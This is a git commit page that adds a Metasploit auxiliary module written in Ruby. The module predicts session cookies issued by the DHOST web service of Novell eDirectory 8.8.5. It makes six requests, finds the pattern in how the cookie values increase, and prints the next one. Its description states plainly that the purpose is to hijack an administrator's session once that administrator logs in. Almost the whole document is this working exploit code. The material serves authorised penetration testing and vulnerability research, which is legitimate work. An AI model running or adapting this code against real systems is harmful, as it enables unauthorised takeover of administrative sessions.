Adds a module for eDirectory cookie prediction - trivial bug found while working on others.
git-svn-id: file:///home/svn/framework3/trunk@7493 4d416f70-5f16-0410-b530-b9f4589650daunstable
HD Moore
parent
80ee6157ed
commit
fbdccdc9e2
|
|
@ -0,0 +1,86 @@
|
||||||
|
##
|
||||||
|
# $Id$
|
||||||
|
##
|
||||||
|
|
||||||
|
##
|
||||||
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
# Framework web site for more information on licensing and terms of use.
|
||||||
|
# http://metasploit.com/framework/
|
||||||
|
##
|
||||||
|
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
|
||||||
|
class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::Tcp
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'Novell eDirectory DHOST Predictable Session Cookie',
|
||||||
|
'Description' => %q{
|
||||||
|
This module is able to predict the next session cookie value issued
|
||||||
|
by the DHOST web service of Novell eDirectory 8.8.5. An attacker can run
|
||||||
|
this module, wait until the real administrator logs in, then specify the
|
||||||
|
predicted cookie value to hijack their session.
|
||||||
|
},
|
||||||
|
'Author' => 'hdm',
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Version' => '$Revision$',
|
||||||
|
))
|
||||||
|
|
||||||
|
register_options([
|
||||||
|
Opt::RPORT(8030),
|
||||||
|
OptBool.new('SSL', [true, 'Use SSL', true])
|
||||||
|
], self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
def run
|
||||||
|
vals = []
|
||||||
|
name = ""
|
||||||
|
|
||||||
|
print_status("Making 5 requests to verify predictions...")
|
||||||
|
1.upto(6) do
|
||||||
|
|
||||||
|
connect
|
||||||
|
req = "GET /dhost/ HTTP/1.1\r\n"
|
||||||
|
req << "Host: #{rhost}:#{rport}\r\n"
|
||||||
|
req << "Connection: close\r\n\r\n"
|
||||||
|
sock.put(req)
|
||||||
|
res = sock.get_once(-1,5)
|
||||||
|
disconnect
|
||||||
|
|
||||||
|
cookie = nil
|
||||||
|
if(res =~ /Cookie:\s*([^\s]+)\s*/mi)
|
||||||
|
cookie = $1
|
||||||
|
cookie,junk = cookie.split(';')
|
||||||
|
name,cookie = cookie.split('=')
|
||||||
|
cookie = cookie.to_i(16)
|
||||||
|
vals << cookie
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
deltas = []
|
||||||
|
prev_val = nil
|
||||||
|
vals.each_index do |i|
|
||||||
|
if(i > 0)
|
||||||
|
delta = vals[i] - prev_val
|
||||||
|
print_status("Cookie: #{i} #{"%.8x" % vals[i]} DELTA #{"%.8x" % delta}")
|
||||||
|
deltas << delta
|
||||||
|
end
|
||||||
|
prev_val = vals[i]
|
||||||
|
end
|
||||||
|
|
||||||
|
deltas.uniq!
|
||||||
|
if(deltas.length < 4)
|
||||||
|
print_status("The next cookie value will be: #{name}=#{"%.8x" % (prev_val + deltas[0])}")
|
||||||
|
else
|
||||||
|
print_status("The cookie value is less predictable, maybe this has been patched?")
|
||||||
|
print_status("Deltas: #{deltas.map{|x| "%.8x" % x}.join(", ")}")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
Loading…
Reference in New Issue